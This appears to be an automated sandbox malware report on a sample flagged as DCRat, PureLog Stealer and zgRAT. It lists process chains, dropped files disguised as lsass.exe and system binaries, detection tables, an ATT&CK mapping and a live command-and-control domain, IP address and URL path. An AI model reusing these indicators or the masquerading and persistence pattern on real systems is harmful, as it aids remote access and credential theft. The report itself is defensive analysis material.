Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"	Jump to behavior
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"	Jump to behavior
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Recovery\lsass.exe "C:\Recovery\lsass.exe"
Source: C:\Recovery\lsass.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BCF654 cpuid

0_2_00BCF654

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00BCAF0F

Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Queries volume information: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe VolumeInformation	Jump to behavior
Source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation	Jump to behavior
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Recovery\lsass.exe VolumeInformation
Source: C:\Recovery\lsass.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BCDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00BCDF1E

Source: C:\Users\user\Desktop\Qsi7IgkrWa.exe

Code function: 0_2_00BBB146 GetVersionExW,

0_2_00BBB146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 1368, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Qsi7IgkrWa.exe, type: SAMPLE
Source: Yara match	File source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\lsass.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Qsi7IgkrWa.exe, type: SAMPLE
Source: Yara match	File source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\lsass.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000004.00000002.1763332886.000000001303B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ComponentBrowserruntimeHostNet.exe PID: 5296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lsass.exe PID: 1368, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: Qsi7IgkrWa.exe, type: SAMPLE
Source: Yara match	File source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1653046738.000000000623E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1653971657.0000000006A3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1725030909.00000000008A2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\lsass.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: Qsi7IgkrWa.exe, type: SAMPLE
Source: Yara match	File source: 4.0.ComponentBrowserruntimeHostNet.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6a42121.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Qsi7IgkrWa.exe.6243121.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe, type: DROPPED
Source: Yara match	File source: C:\HypercontainerServerhostDll\TextInputHost.exe, type: DROPPED
Source: Yara match	File source: C:\Recovery\lsass.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	2 Command and Scripting Interpreter	11 Scripting	11 Process Injection	113 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	121 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	3 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	36 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Qsi7IgkrWa.exe	71%	ReversingLabs	Win32.Trojan.Uztuby
Qsi7IgkrWa.exe	60%	Virustotal		Browse
Qsi7IgkrWa.exe	100%	Avira	VBS/Runner.VPG
Qsi7IgkrWa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\CmKYhHkf.log	100%	Avira	TR/PSW.Agent.qngqt
C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\HypercontainerServerhostDll\RHmzYjMP0dDm1pBgOIzRbUC3iX8v0CjLnvVuc2eDTHRjOJ2gOiG4vHIxjIg.vbe	100%	Avira	VBS/Runner.VPG
C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\CKyWUHyH.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat	100%	Avira	BAT/Delbat.C
C:\HypercontainerServerhostDll\TextInputHost.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\Users\user\Desktop\AFUvvHdz.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\GQmWAABO.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat	100%	Avira	BAT/Delbat.C
C:\Recovery\lsass.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat	100%	Avira	BAT/Delbat.C
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Avira	TR/Spy.Agent.qwlok
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\CmKYhHkf.log	100%	Joe Sandbox ML
C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	100%	Joe Sandbox ML
C:\HypercontainerServerhostDll\TextInputHost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\HInMzsNO.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\AFUvvHdz.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\JeCeCscc.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GQmWAABO.log	100%	Joe Sandbox ML
C:\Recovery\lsass.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\EaXPTOzT.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	100%	Joe Sandbox ML
C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\HypercontainerServerhostDll\TextInputHost.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\Windows Media Player\Network Sharing\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Microsoft Office 15\ClientX64\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files\Windows Portable Devices\ZqsAyoZSZrLcIQRnmBOCJwJxHHOXc.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Recovery\lsass.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AFUvvHdz.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AsWoiMty.log	25%	ReversingLabs
C:\Users\user\Desktop\CKyWUHyH.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\CYkgyfvY.log	25%	ReversingLabs
C:\Users\user\Desktop\CmKYhHkf.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\EaXPTOzT.log	8%	ReversingLabs
C:\Users\user\Desktop\FrxXNAmm.log	25%	ReversingLabs
C:\Users\user\Desktop\GQmWAABO.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\HInMzsNO.log	8%	ReversingLabs
C:\Users\user\Desktop\JeCeCscc.log	8%	ReversingLabs
C:\Users\user\Desktop\LkfFbrxk.log	25%	ReversingLabs
C:\Users\user\Desktop\MhHNxrMf.log	8%	ReversingLabs
C:\Users\user\Desktop\MtSmEjDp.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\PgRkIPoV.log	8%	ReversingLabs
C:\Users\user\Desktop\QXsvSdGP.log	8%	ReversingLabs
C:\Users\user\Desktop\QrHcjUSw.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\RIKTmlsJ.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TBLKldEI.log	25%	ReversingLabs
C:\Users\user\Desktop\UKBLugCN.log	25%	ReversingLabs
C:\Users\user\Desktop\UynSGdTD.log	8%	ReversingLabs
C:\Users\user\Desktop\XVlEhDHN.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\XmyUnkUi.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\YBBlCWWw.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ZPkAsstD.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\brdjWOxr.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\dhGiqFYl.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gVSkXNZP.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gtMhCYIK.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\gvHJzrMq.log	8%	ReversingLabs
C:\Users\user\Desktop\heJamQmd.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\iAcIGVjp.log	25%	ReversingLabs
C:\Users\user\Desktop\icHKrlAV.log	25%	ReversingLabs
C:\Users\user\Desktop\kwMHLMmE.log	25%	ReversingLabs
C:\Users\user\Desktop\nDKQhfgz.log	8%	ReversingLabs
C:\Users\user\Desktop\nPayaidT.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\oZQzjlbX.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\phNJAZcc.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\qjmAjDHY.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\reDyPeef.log	25%	ReversingLabs
C:\Users\user\Desktop\ryfhxvpx.log	8%	ReversingLabs
C:\Users\user\Desktop\tIBixNUy.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\uhqhlNja.log	8%	ReversingLabs
C:\Users\user\Desktop\vXhOtgDl.log	25%	ReversingLabs
C:\Users\user\Desktop\whSGRYvh.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
595506cm.n9shka.top	15%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://595506cm.n9shka.topP	0%	Avira URL Cloud	safe
http://595506cm.n9shka.top/	100%	Avira URL Cloud	malware
http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php	100%	Avira URL Cloud	malware
http://595506cm.n9shka.top	100%	Avira URL Cloud	malware
http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php	1%	Virustotal		Browse
http://595506cm.n9shka.top/	15%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
595506cm.n9shka.top	37.44.238.250	true	true	15%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php	true	1%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://595506cm.n9shka.topP	lsass.exe, 00000025.00000002.2463680007.0000000002A1A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://595506cm.n9shka.top/	lsass.exe, 0000003A.00000002.2859804094.0000000003810000.00000004.00000800.00020000.00000000.sdmp	true	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
